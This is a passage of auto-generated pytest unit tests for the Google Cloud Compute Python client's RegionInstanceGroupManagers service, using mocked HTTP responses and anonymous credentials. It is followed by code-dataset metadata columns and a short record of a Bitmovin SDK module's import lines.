instance_group_manager="instance_group_manager_value",
region_instance_group_managers_recreate_request_resource=compute.RegionInstanceGroupManagersRecreateRequest(
instances=["instances_value"]
),
)
mock_args.update(sample_request)
client.recreate_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/recreateInstances"
% client.transport._host,
args[1],
)
def test_recreate_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.recreate_instances(
compute.RecreateInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_recreate_request_resource=compute.RegionInstanceGroupManagersRecreateRequest(
instances=["instances_value"]
),
)
def test_resize_rest(
transport: str = "rest",
request_type=compute.ResizeRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.resize(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_resize_rest_bad_request(
transport: str = "rest",
request_type=compute.ResizeRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.resize(request)
def test_resize_rest_from_dict():
test_resize_rest(request_type=dict)
def test_resize_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
size=443,
)
mock_args.update(sample_request)
client.resize(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/resize"
% client.transport._host,
args[1],
)
def test_resize_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.resize(
compute.ResizeRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
size=443,
)
def test_set_instance_template_rest(
transport: str = "rest",
request_type=compute.SetInstanceTemplateRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_set_template_request_resource"
] = compute.RegionInstanceGroupManagersSetTemplateRequest(
instance_template="instance_template_value"
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_instance_template(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_set_instance_template_rest_bad_request(
transport: str = "rest",
request_type=compute.SetInstanceTemplateRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_set_template_request_resource"
] = compute.RegionInstanceGroupManagersSetTemplateRequest(
instance_template="instance_template_value"
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.set_instance_template(request)
def test_set_instance_template_rest_from_dict():
test_set_instance_template_rest(request_type=dict)
def test_set_instance_template_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_set_template_request_resource=compute.RegionInstanceGroupManagersSetTemplateRequest(
instance_template="instance_template_value"
),
)
mock_args.update(sample_request)
client.set_instance_template(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/setInstanceTemplate"
% client.transport._host,
args[1],
)
def test_set_instance_template_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_instance_template(
compute.SetInstanceTemplateRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_set_template_request_resource=compute.RegionInstanceGroupManagersSetTemplateRequest(
instance_template="instance_template_value"
),
)
def test_set_target_pools_rest(
transport: str = "rest",
request_type=compute.SetTargetPoolsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_set_target_pools_request_resource"
] = compute.RegionInstanceGroupManagersSetTargetPoolsRequest(
fingerprint="fingerprint_value"
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_target_pools(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_set_target_pools_rest_bad_request(
transport: str = "rest",
request_type=compute.SetTargetPoolsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_set_target_pools_request_resource"
] = compute.RegionInstanceGroupManagersSetTargetPoolsRequest(
fingerprint="fingerprint_value"
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.set_target_pools(request)
def test_set_target_pools_rest_from_dict():
test_set_target_pools_rest(request_type=dict)
def test_set_target_pools_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_set_target_pools_request_resource=compute.RegionInstanceGroupManagersSetTargetPoolsRequest(
fingerprint="fingerprint_value"
),
)
mock_args.update(sample_request)
client.set_target_pools(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/setTargetPools"
% client.transport._host,
args[1],
)
def test_set_target_pools_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_target_pools(
compute.SetTargetPoolsRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_set_target_pools_request_resource=compute.RegionInstanceGroupManagersSetTargetPoolsRequest(
fingerprint="fingerprint_value"
),
)
def test_update_per_instance_configs_rest(
transport: str = "rest",
request_type=compute.UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_update_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerUpdateInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.update_per_instance_configs(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_update_per_instance_configs_rest_bad_request(
transport: str = "rest",
request_type=compute.UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_update_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerUpdateInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.update_per_instance_configs(request)
def test_update_per_instance_configs_rest_from_dict():
test_update_per_instance_configs_rest(request_type=dict)
def test_update_per_instance_configs_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_update_instance_config_req_resource=compute.RegionInstanceGroupManagerUpdateInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
),
)
mock_args.update(sample_request)
client.update_per_instance_configs(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/updatePerInstanceConfigs"
% client.transport._host,
args[1],
)
def test_update_per_instance_configs_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_per_instance_configs(
compute.UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_update_instance_config_req_resource=compute.RegionInstanceGroupManagerUpdateInstanceConfigReq(
per_instance_configs=[
compute.PerInstanceConfig(fingerprint="fingerprint_value")
]
),
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.RegionInstanceGroupManagersRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.RegionInstanceGroupManagersRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = RegionInstanceGroupManagersClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.RegionInstanceGroupManagersRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = RegionInstanceGroupManagersClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.RegionInstanceGroupManagersRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = RegionInstanceGroupManagersClient(transport=transport)
assert client.transport is transport
@pytest.mark.parametrize(
"transport_class", [transports.RegionInstanceGroupManagersRestTransport,]
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_region_instance_group_managers_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.RegionInstanceGroupManagersTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_region_instance_group_managers_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.compute_v1.services.region_instance_group_managers.transports.RegionInstanceGroupManagersTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.RegionInstanceGroupManagersTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"abandon_instances",
"apply_updates_to_instances",
"create_instances",
"delete",
"delete_instances",
"delete_per_instance_configs",
"get",
"insert",
"list",
"list_errors",
"list_managed_instances",
"list_per_instance_configs",
"patch",
"patch_per_instance_configs",
"recreate_instances",
"resize",
"set_instance_template",
"set_target_pools",
"update_per_instance_configs",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
def test_region_instance_group_managers_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.compute_v1.services.region_instance_group_managers.transports.RegionInstanceGroupManagersTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.RegionInstanceGroupManagersTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id="octopus",
)
def test_region_instance_group_managers_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.compute_v1.services.region_instance_group_managers.transports.RegionInstanceGroupManagersTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.RegionInstanceGroupManagersTransport()
adc.assert_called_once()
def test_region_instance_group_managers_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
RegionInstanceGroupManagersClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
),
quota_project_id=None,
)
def test_region_instance_group_managers_http_transport_client_cert_source_for_mtls():
cred = ga_credentials.AnonymousCredentials()
with mock.patch(
"google.auth.transport.requests.AuthorizedSession.configure_mtls_channel"
) as mock_configure_mtls_channel:
transports.RegionInstanceGroupManagersRestTransport(
credentials=cred, client_cert_source_for_mtls=client_cert_source_callback
)
mock_configure_mtls_channel.assert_called_once_with(client_cert_source_callback)
def test_region_instance_group_managers_host_no_port():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com"
),
)
assert client.transport._host == "compute.googleapis.com:443"
def test_region_instance_group_managers_host_with_port():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com:8000"
),
)
assert client.transport._host == "compute.googleapis.com:8000"
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = RegionInstanceGroupManagersClient.common_billing_account_path(
billing_account
)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = RegionInstanceGroupManagersClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder,)
actual = RegionInstanceGroupManagersClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = RegionInstanceGroupManagersClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization,)
actual = RegionInstanceGroupManagersClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = RegionInstanceGroupManagersClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project,)
actual = RegionInstanceGroupManagersClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = RegionInstanceGroupManagersClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = RegionInstanceGroupManagersClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = RegionInstanceGroupManagersClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = RegionInstanceGroupManagersClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.RegionInstanceGroupManagersTransport, "_prep_wrapped_messages"
) as prep:
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.RegionInstanceGroupManagersTransport, "_prep_wrapped_messages"
) as prep:
transport_class = RegionInstanceGroupManagersClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
def test_transport_close():
transports = {
"rest": "_session",
}
for transport, close_name in transports.items():
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"rest",
]
for transport in transports:
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
| 39.148252
| 144
| 0.687054
| 17,537
| 167,946
| 6.284028
| 0.026572
| 0.041796
| 0.041033
| 0.020689
| 0.925692
| 0.903732
| 0.886709
| 0.862
| 0.844569
| 0.833208
| 0
| 0.007054
| 0.234385
| 167,946
| 4,289
| 145
| 39.157379
| 0.85001
| 0.12251
| 0
| 0.747057
| 0
| 0.004226
| 0.149108
| 0.057455
| 0
| 0
| 0
| 0.000233
| 0.13613
| 1
| 0.040447
| false
| 0.000302
| 0.007244
| 0.000604
| 0.048295
| 0.005433
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a18914c1c0a481ad16e079c4e8f3acd92019441
| 325
|
py
|
Python
|
bitmovin_api_sdk/encoding/outputs/s3_role_based/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/outputs/s3_role_based/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/outputs/s3_role_based/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
from bitmovin_api_sdk.encoding.outputs.s3_role_based.s3_role_based_api import S3RoleBasedApi
from bitmovin_api_sdk.encoding.outputs.s3_role_based.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.outputs.s3_role_based.s3_role_based_output_list_query_params import S3RoleBasedOutputListQueryParams
| 81.25
| 131
| 0.923077
| 47
| 325
| 5.914894
| 0.382979
| 0.107914
| 0.197842
| 0.194245
| 0.553957
| 0.553957
| 0.553957
| 0.553957
| 0.553957
| 0.395683
| 0
| 0.022364
| 0.036923
| 325
| 3
| 132
| 108.333333
| 0.865815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
